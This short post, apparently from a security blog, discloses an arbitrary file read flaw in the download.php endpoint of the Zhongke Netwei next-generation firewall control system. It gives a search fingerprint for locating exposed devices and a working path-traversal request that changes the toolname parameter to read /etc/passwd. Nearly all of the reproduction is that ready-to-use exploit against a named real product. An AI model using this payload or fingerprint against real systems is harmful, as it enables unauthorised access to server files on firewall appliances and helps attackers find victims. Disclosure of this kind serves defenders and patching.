Zhongke Netwei Next-Generation Firewall Control System download.php Arbitrary File Read Vulnerability
Vulnerability Description
The download.php endpoint of the Zhongke Netwei next-generation firewall control system has an arbitrary file read vulnerability, through which an attacker can read files on the server.
Vulnerability Impact
Zhongke Netwei next-generation firewall control system
Network surveying and mapping
body="Get_Verify_Info(hex_md5(user_string)."
Vulnerability reproduction
The login page is as follows
The vulnerability exists in download.php
Click any item, capture the request, and change the toolname parameter:
/download.php?&class=vpn&toolname=../../../../../../../../etc/passwd
This post is licensed under CC BY 4.0 by the author.